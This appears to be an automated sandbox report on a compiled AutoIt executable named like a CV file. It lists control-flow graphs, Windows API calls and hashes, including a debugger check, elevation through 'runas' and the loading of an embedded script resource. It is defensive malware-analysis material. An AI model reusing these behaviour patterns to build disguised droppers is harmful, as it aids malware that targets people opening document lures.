                                                                                            control_flow_graph 643 eb043-eb080 call ef8a0 646 eb089-eb08b 643->646 647 eb082-eb084 643->647 649 eb0ac-eb0d9 646->649 650 eb08d-eb0a7 call e7bda call e7c0e call e6e10 646->650 648 eb860-eb86c call ea70c 647->648 651 eb0db-eb0de 649->651 652 eb0e0-eb0e7 649->652 650->648 651->652 655 eb10b-eb110 651->655 656 eb0e9-eb100 call e7bda call e7c0e call e6e10 652->656 657 eb105 652->657 661 eb11f-eb12d call f3bf2 655->661 662 eb112-eb11c call ef82f 655->662 691 eb851-eb854 656->691 657->655 672 eb44b-eb45d 661->672 673 eb133-eb145 661->673 662->661 677 eb7b8-eb7d5 WriteFile 672->677 678 eb463-eb473 672->678 673->672 676 eb14b-eb183 call e7a0d GetConsoleMode 673->676 676->672 696 eb189-eb18f 676->696 684 eb7d7-eb7df 677->684 685 eb7e1-eb7e7 GetLastError 677->685 681 eb55a-eb55f 678->681 682 eb479-eb484 678->682 686 eb565-eb56e 681->686 687 eb663-eb66e 681->687 689 eb48a-eb49a 682->689 690 eb81b-eb833 682->690 692 eb7e9 684->692 685->692 686->690 694 eb574 686->694 687->690 700 eb674 687->700 697 eb4a0-eb4a3 689->697 698 eb83e-eb84e call e7c0e call e7bda 690->698 699 eb835-eb838 690->699 695 eb85e-eb85f 691->695 693 eb7ef-eb7f1 692->693 701 eb856-eb85c 693->701 702 eb7f3-eb7f5 693->702 703 eb57e-eb595 694->703 695->648 704 eb199-eb1bc GetConsoleCP 696->704 705 eb191-eb193 696->705 706 eb4e9-eb520 WriteFile 697->706 707 eb4a5-eb4be 697->707 698->691 699->698 708 eb83a-eb83c 699->708 709 eb67e-eb693 700->709 701->695 702->690 712 eb7f7-eb7fc 702->712 713 eb59b-eb59e 703->713 714 eb1c2-eb1ca 704->714 715 eb440-eb446 704->715 705->672 705->704 706->685 718 eb526-eb538 706->718 716 eb4cb-eb4e7 707->716 717 eb4c0-eb4ca 707->717 708->695 719 eb699-eb69b 709->719 723 eb7fe-eb810 call e7c0e call e7bda 712->723 724 eb812-eb819 call e7bed 712->724 725 eb5de-eb627 WriteFile 713->725 726 eb5a0-eb5b6 713->726 727 eb1d4-eb1d6 714->727 715->702 716->697 716->706 717->716 718->693 728 eb53e-eb54f 718->728 720 eb69d-eb6b3 719->720 721 eb6d8-eb719 WideCharToMultiByte 719->721 729 eb6c7-eb6d6 720->729 730 eb6b5-eb6c4 720->730 721->685 732 eb71f-eb721 721->732 723->691 724->691 725->685 737 eb62d-eb645 725->737 734 eb5cd-eb5dc 726->734 735 eb5b8-eb5ca 726->735 738 eb1dc-eb1fe 727->738 739 eb36b-eb36e 727->739 728->689 740 eb555 728->740 729->719 729->721 730->729 743 eb727-eb75a WriteFile 732->743 734->713 734->725 735->734 737->693 746 eb64b-eb658 737->746 747 eb217-eb223 call e1688 738->747 748 eb200-eb215 738->748 741 eb375-eb3a2 739->741 742 eb370-eb373 739->742 740->693 749 eb3a8-eb3ab 741->749 742->741 742->749 750 eb75c-eb776 743->750 751 eb77a-eb78e GetLastError 743->751 746->703 753 eb65e 746->753 763 eb269-eb26b 747->763 764 eb225-eb239 747->764 754 eb271-eb283 call f40f7 748->754 756 eb3ad-eb3b0 749->756 757 eb3b2-eb3c5 call f5884 749->757 750->743 758 eb778 750->758 761 eb794-eb796 751->761 753->693 773 eb289 754->773 774 eb435-eb43b 754->774 756->757 765 eb407-eb40a 756->765 757->685 777 eb3cb-eb3d5 757->777 758->761 761->692 768 eb798-eb7b0 761->768 763->754 770 eb23f-eb254 call f40f7 764->770 771 eb412-eb42d 764->771 765->727 769 eb410 765->769 768->709 775 eb7b6 768->775 769->774 770->774 783 eb25a-eb267 770->783 771->774 778 eb28f-eb2c4 WideCharToMultiByte 773->778 774->692 775->693 780 eb3fb-eb401 777->780 781 eb3d7-eb3ee call f5884 777->781 778->774 782 eb2ca-eb2f0 WriteFile 778->782 780->765 781->685 788 eb3f4-eb3f5 781->788 782->685 785 eb2f6-eb30e 782->785 783->778 785->774 787 eb314-eb31b 785->787 787->780 789 eb321-eb34c WriteFile 787->789 788->780 789->685 790 eb352-eb359 789->790 790->774 791 eb35f-eb366 790->791 791->780
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 32d3e0e76d9b7126ae57ce52907bc55ff9aa0719b48ae14b9dfa22f444ed3092
                                                                                            • Instruction ID: 72550318e499be5d08242ffc76affbbb1b180c5dda67f830a81c3cd418bea42f
                                                                                            • Opcode Fuzzy Hash: 32d3e0e76d9b7126ae57ce52907bc55ff9aa0719b48ae14b9dfa22f444ed3092
                                                                                            • Instruction Fuzzy Hash: FA324B75B022A88FDB258F15DD816EAB7F5FF4A310F1841D9E40AA7A91D7309E80CF52

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?,00000000,00000001,?,?,000C3AA3,?), ref: 000C3D45
                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,000C3AA3,?), ref: 000C3D57
                                                                                            • GetFullPathNameW.KERNEL32(00007FFF,?,?,00181148,00181130,?,?,?,?,000C3AA3,?), ref: 000C3DC8
                                                                                              • Part of subcall function 000C6430: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,000C3DEE,00181148,?,?,?,?,?,000C3AA3,?), ref: 000C6471
                                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,000C3AA3,?), ref: 000C3E48
                                                                                            • MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,001728F4,00000010), ref: 00131CCE
                                                                                            • SetCurrentDirectoryW.KERNEL32(?,00181148,?,?,?,?,?,000C3AA3,?), ref: 00131D06
                                                                                            • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,0015DAB4,00181148,?,?,?,?,?,000C3AA3,?), ref: 00131D89
                                                                                            • ShellExecuteW.SHELL32(00000000,?,?,?,?,000C3AA3), ref: 00131D90
                                                                                              • Part of subcall function 000C3E6E: GetSysColorBrush.USER32(0000000F), ref: 000C3E79
                                                                                              • Part of subcall function 000C3E6E: LoadCursorW.USER32(00000000,00007F00), ref: 000C3E88
                                                                                              • Part of subcall function 000C3E6E: LoadIconW.USER32(00000063), ref: 000C3E9E
                                                                                              • Part of subcall function 000C3E6E: LoadIconW.USER32(000000A4), ref: 000C3EB0
                                                                                              • Part of subcall function 000C3E6E: LoadIconW.USER32(000000A2), ref: 000C3EC2
                                                                                              • Part of subcall function 000C3E6E: RegisterClassExW.USER32(?), ref: 000C3F30
                                                                                              • Part of subcall function 000C36B8: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C36E6
                                                                                              • Part of subcall function 000C36B8: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C3707
                                                                                              • Part of subcall function 000C36B8: ShowWindow.USER32(00000000,?,?,?,?,000C3AA3,?), ref: 000C371B
                                                                                              • Part of subcall function 000C36B8: ShowWindow.USER32(00000000,?,?,?,?,000C3AA3,?), ref: 000C3724
                                                                                              • Part of subcall function 000C4FFC: _memset.LIBCMT ref: 000C5022
                                                                                              • Part of subcall function 000C4FFC: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C50CB
                                                                                            Strings
                                                                                            • runas, xrefs: 00131D84
                                                                                            • This is a third-party compiled AutoIt script., xrefs: 00131CC8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$IconLoad$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundMessageNotifyPresentRegisterShellShell__memset
                                                                                            • String ID: This is a third-party compiled AutoIt script.$runas
                                                                                            • API String ID: 438480954-3287110873
                                                                                            • Opcode ID: ab9176667f4463e6bb0367b1dc6a206b7f604bf8d31c586d0a5cb87347c8070a
                                                                                            • Instruction ID: a0efe85682f0a105915f3abbd13ca307f85afe728bba475a772b6ce1c910b861
                                                                                            • Opcode Fuzzy Hash: ab9176667f4463e6bb0367b1dc6a206b7f604bf8d31c586d0a5cb87347c8070a
                                                                                            • Instruction Fuzzy Hash: ED51D535A04249BADF11ABF0DC49FED7BB9AB16B44F04806DF601621E3DB745B86CB21

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1075 dddc0-dde4f call cd7f7 GetVersionExW call c6a63 call ddfb4 call c6571 1084 dde55-dde56 1075->1084 1085 1324c8-1324cb 1075->1085 1086 dde58-dde63 1084->1086 1087 dde92-ddea2 call ddf77 1084->1087 1088 1324e4-1324e8 1085->1088 1089 1324cd 1085->1089 1093 dde69-dde6b 1086->1093 1094 13244e-132454 1086->1094 1106 ddea4-ddec1 GetCurrentProcess call ddf5f 1087->1106 1107 ddec7-ddee1 1087->1107 1091 1324d3-1324dc 1088->1091 1092 1324ea-1324f3 1088->1092 1090 1324d0 1089->1090 1090->1091 1091->1088 1092->1090 1098 1324f5-1324f8 1092->1098 1099 132469-132475 1093->1099 1100 dde71-dde74 1093->1100 1096 132456-132459 1094->1096 1097 13245e-132464 1094->1097 1096->1087 1097->1087 1098->1091 1102 132477-13247a 1099->1102 1103 13247f-132485 1099->1103 1104 132495-132498 1100->1104 1105 dde7a-dde89 1100->1105 1102->1087 1103->1087 1104->1087 1111 13249e-1324b3 1104->1111 1112 dde8f 1105->1112 1113 13248a-132490 1105->1113 1106->1107 1126 ddec3 1106->1126 1109 ddf31-ddf3b GetSystemInfo 1107->1109 1110 ddee3-ddef7 call de00c 1107->1110 1115 ddf0e-ddf1a 1109->1115 1123 ddf29-ddf2f GetSystemInfo 1110->1123 1124 ddef9-ddf01 call ddff4 GetNativeSystemInfo 1110->1124 1117 1324b5-1324b8 1111->1117 1118 1324bd-1324c3 1111->1118 1112->1087 1113->1087 1120 ddf1c-ddf1f FreeLibrary 1115->1120 1121 ddf21-ddf26 1115->1121 1117->1087 1118->1087 1120->1121 1125 ddf03-ddf07 1123->1125 1124->1125 1125->1115 1129 ddf09-ddf0c FreeLibrary 1125->1129 1126->1107 1129->1115
                                                                                            APIs
                                                                                            • GetVersionExW.KERNEL32(?), ref: 000DDDEC
                                                                                            • GetCurrentProcess.KERNEL32(00000000,0015DC38,?,?), ref: 000DDEAC
                                                                                            • GetNativeSystemInfo.KERNELBASE(?,0015DC38,?,?), ref: 000DDF01
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 000DDF0C
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 000DDF1F
                                                                                            • GetSystemInfo.KERNEL32(?,0015DC38,?,?), ref: 000DDF29
                                                                                            • GetSystemInfo.KERNEL32(?,0015DC38,?,?), ref: 000DDF35
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: InfoSystem$FreeLibrary$CurrentNativeProcessVersion
                                                                                            • String ID:
                                                                                            • API String ID: 3851250370-0
                                                                                            • Opcode ID: cad0459f48a10ee20df232efc5ff0cd5f749fefa86414f9b2f88e842a24e4a1b
                                                                                            • Instruction ID: 3e300dabf48253166e01689f97da42f9dc83ff6617b46ab82f6e8b238810f398
                                                                                            • Opcode Fuzzy Hash: cad0459f48a10ee20df232efc5ff0cd5f749fefa86414f9b2f88e842a24e4a1b
                                                                                            • Instruction Fuzzy Hash: BB619DB180A384DBCF25DF6898C15ED7FA4AF2A300F1989EAD8459F307C6348949CB65

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1147 c406b-c4083 CreateStreamOnHGlobal 1148 c4085-c409c FindResourceExW 1147->1148 1149 c40a3-c40a6 1147->1149 1150 134f16-134f25 LoadResource 1148->1150 1151 c40a2 1148->1151 1150->1151 1152 134f2b-134f39 SizeofResource 1150->1152 1151->1149 1152->1151 1153 134f3f-134f4a LockResource 1152->1153 1153->1151 1154 134f50-134f6e 1153->1154 1154->1151
                                                                                            APIs
                                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,000C449E,?,?,00000000,00000001), ref: 000C407B
                                                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,000C449E,?,?,00000000,00000001), ref: 000C4092
                                                                                            • LoadResource.KERNEL32(?,00000000,?,?,000C449E,?,?,00000000,00000001,?,?,?,?,?,?,000C41FB), ref: 00134F1A
                                                                                            • SizeofResource.KERNEL32(?,00000000,?,?,000C449E,?,?,00000000,00000001,?,?,?,?,?,?,000C41FB), ref: 00134F2F
                                                                                            • LockResource.KERNEL32(000C449E,?,?,000C449E,?,?,00000000,00000001,?,?,?,?,?,?,000C41FB,00000000), ref: 00134F42
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                                            • String ID: SCRIPT
                                                                                            • API String ID: 3051347437-3967369404
                                                                                            • Opcode ID: 6fecb7f595950942c59647946d147fba988917d913af70957d69547e2b0cb42f
                                                                                            • Instruction ID: f1e16f23b5168613b493eabfd7661c16feb27a4ab9ecde59ae7ca5ead10ca372
                                                                                            • Opcode Fuzzy Hash: 6fecb7f595950942c59647946d147fba988917d913af70957d69547e2b0cb42f
                                                                                            • Instruction Fuzzy Hash: 21113C75240701BFEB218B65EC58F2B7BB9EBC6B51F24416CF602966A0DBB1DC409A20
                                                                                            APIs
                                                                                            • GetFileAttributesW.KERNELBASE(?,00132F49), ref: 00106CB9
                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00106CCA
                                                                                            • FindClose.KERNEL32(00000000), ref: 00106CDA
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileFind$AttributesCloseFirst
                                                                                            • String ID:
                                                                                            • API String ID: 48322524-0
                                                                                            • Opcode ID: 9b87337562c5fed10fb33997bf0c0290f65a289529caa962c0b857941036be3e
                                                                                            • Instruction ID: 4166e0061eb45616dc7807b48f742d522bcb2faf8f32c3ab08a2e3826308ca34
                                                                                            • Opcode Fuzzy Hash: 9b87337562c5fed10fb33997bf0c0290f65a289529caa962c0b857941036be3e
                                                                                            • Instruction Fuzzy Hash: 29E0D83581041057D6146738FD0D4E937ACDB16339F100749F9B1C11E0E7B0D95045D5
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Exception@8Throwstd::exception::exception
                                                                                            • String ID: @
                                                                                            • API String ID: 3728558374-2766056989
                                                                                            • Opcode ID: aca9c607c31dac25571cc92c379211ad2446872181320b3d1210c89832c0734d
                                                                                            • Instruction ID: ee61a26a5f24f0b404076ce56872b399d561e64dfbc4e4f275854010d161c847
                                                                                            • Opcode Fuzzy Hash: aca9c607c31dac25571cc92c379211ad2446872181320b3d1210c89832c0734d
                                                                                            • Instruction Fuzzy Hash: BB728E75D042099FDF24DF94C481ABEB7B5EF58300F14806AF909AB392D771AE45CBA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: BuffCharUpper
                                                                                            • String ID:
                                                                                            • API String ID: 3964851224-0
                                                                                            • Opcode ID: 325ff196036911cee117266527ca59da179b2cba1c5da3eac01f7c5dc32cfa21
                                                                                            • Instruction ID: 2d2e11e94ae7499250fab10247af41f4d112c52cdcbd21a0dbe0ad18b32dce85
                                                                                            • Opcode Fuzzy Hash: 325ff196036911cee117266527ca59da179b2cba1c5da3eac01f7c5dc32cfa21
                                                                                            • Instruction Fuzzy Hash: 8F9249706083419FD724DF18C485B6AB7E1BF88304F14895EF99A8B3A2D771ED45CBA2
                                                                                            APIs
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000CE959
                                                                                            • timeGetTime.WINMM ref: 000CEBFA
                                                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000CED2E
                                                                                            • TranslateMessage.USER32(?), ref: 000CED3F
                                                                                            • DispatchMessageW.USER32(?), ref: 000CED4A
                                                                                            • LockWindowUpdate.USER32(00000000), ref: 000CED79
                                                                                            • DestroyWindow.USER32 ref: 000CED85
                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000CED9F
                                                                                            • Sleep.KERNEL32(0000000A), ref: 00135270
                                                                                            • TranslateMessage.USER32(?), ref: 001359F7
                                                                                            • DispatchMessageW.USER32(?), ref: 00135A05
                                                                                            • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00135A19
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: Message$DispatchPeekTranslateWindow$DestroyLockSleepTimeUpdatetime
                                                                                            • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                                                            • API String ID: 2641332412-570651680
                                                                                            • Opcode ID: c57af02f9461cd738c6aa9ff00270482f3e7491c513c09bf9ef3feacf5fd1c4f
                                                                                            • Instruction ID: e6e7e30ce4333e4097d7e4e739ee483568fcdb1bbacbf9b5b4b7ff825ade5b70
                                                                                            • Opcode Fuzzy Hash: c57af02f9461cd738c6aa9ff00270482f3e7491c513c09bf9ef3feacf5fd1c4f
                                                                                            • Instruction Fuzzy Hash: 0462A170504380DFEB24DF24C885FAE77E5BF44704F18496DF98A8B2A2DB719985CB62
                                                                                            APIs
                                                                                            • ___createFile.LIBCMT ref: 000F5EC3
                                                                                            • ___createFile.LIBCMT ref: 000F5F04
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000F5F2D
                                                                                            • __dosmaperr.LIBCMT ref: 000F5F34
                                                                                            • GetFileType.KERNELBASE(00000000,?,?,?,?,?,00000000,00000109), ref: 000F5F47
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000109), ref: 000F5F6A
                                                                                            • __dosmaperr.LIBCMT ref: 000F5F73
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000F5F7C
                                                                                            • __set_osfhnd.LIBCMT ref: 000F5FAC
                                                                                            • __lseeki64_nolock.LIBCMT ref: 000F6016
                                                                                            • __close_nolock.LIBCMT ref: 000F603C
                                                                                            • __chsize_nolock.LIBCMT ref: 000F606C
                                                                                            • __lseeki64_nolock.LIBCMT ref: 000F607E
                                                                                            • __lseeki64_nolock.LIBCMT ref: 000F6176
                                                                                            • __lseeki64_nolock.LIBCMT ref: 000F618B
                                                                                            • __close_nolock.LIBCMT ref: 000F61EB
                                                                                              • Part of subcall function 000EEA9C: CloseHandle.KERNELBASE(00000000,0016EEF4,00000000,?,000F6041,0016EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000EEAEC
                                                                                              • Part of subcall function 000EEA9C: GetLastError.KERNEL32(?,000F6041,0016EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000EEAF6
                                                                                              • Part of subcall function 000EEA9C: __free_osfhnd.LIBCMT ref: 000EEB03
                                                                                              • Part of subcall function 000EEA9C: __dosmaperr.LIBCMT ref: 000EEB25
                                                                                              • Part of subcall function 000E7C0E: __getptd_noexit.LIBCMT ref: 000E7C0E
                                                                                            • __lseeki64_nolock.LIBCMT ref: 000F620D
                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 000F6342
                                                                                            • ___createFile.LIBCMT ref: 000F6361
                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 000F636E
                                                                                            • __dosmaperr.LIBCMT ref: 000F6375
                                                                                            • __free_osfhnd.LIBCMT ref: 000F6395
                                                                                            • __invoke_watson.LIBCMT ref: 000F63C3
                                                                                            • __wsopen_helper.LIBCMT ref: 000F63DD
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2081310473.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2081294368.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000014D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081358573.000000000016E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081397303.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2081414249.0000000000184000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_c0000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                            Similarity
                                                                                            • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                                                            • String ID: @
                                                                                            • API String ID: 3896587723-2766056989
                                                                                            • Opcode ID: 94870d21dfba58e594145042169b489bb207575c42a96403d8e6eaf283b44b44
                                                                                            • Instruction ID: bd180950afc438612c1078f3e6980bba062407c2691c4a8816b8e072aea4bde0
                                                                                            • Opcode Fuzzy Hash: 94870d21dfba58e594145042169b489bb207575c42a96403d8e6eaf283b44b44
                                                                                            • Instruction Fuzzy Hash: 1322387190090E9FEF699F68DC85BFD7BA1EB05314F244228E711A7AE2C7368D40E751

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • _wcscpy.LIBCMT ref: 0010FA96
                                                                                            • _wcschr.LIBCMT ref: 0010FAA4
                                                                                            • _wcscpy.LIBCMT ref: 0010FABB
                                                                                            • _wcscat.LIBCMT ref: 0010FACA
                                                                                            • _wcscat.LIBCMT ref: 0010FAE8
                                                                                            • _wcscpy.LIBCMT ref: 0010FB09
                                                                                            • __wsplitpath.LIBCMT ref: 0010FBE6
                                                                                            • _wcscpy.LIBCMT ref: 0010FC0B
                                                                                            • _wcscpy.LIBCMT ref: 0010FC1D
                                                                                            • _wcscpy.LIBCMT ref: 0010FC32
                                                                                            • _wcscat.LIBCMT ref: 0010FC47
                                                                                            • _wcscat.LIBCMT ref: 0010FC59
                                                                                            • _wcscat.LIBCMT ref: 0010FC6E
                                                                                              • Part of subcall function 0010BFA4: _wcscmp.LIBCMT ref: 0010C03E
                                                                                              • Part of subcall function 0010BFA4: __wsplitpath.LIBCMT ref: 0010C083
                                                                                              • Part of subcall function 0010BFA4: _wcscpy.LIBCMT ref: 0010C096
                                                                                              • Part of subcall function 0010BFA4: _wcscat.LIBCMT ref: 0010C0A9
                                                                                              • Part of subcall function 0010BFA4: __wsplitpath.LIBCMT ref: 0010C0CE
                                                                                              • Part of subcall function 0010BFA4: _wcscat.LIBCMT ref: 0010C0E4
                                                                                              • Part of subcall function 0010BFA4: _wcscat.LIBCMT ref: 0010C0F7
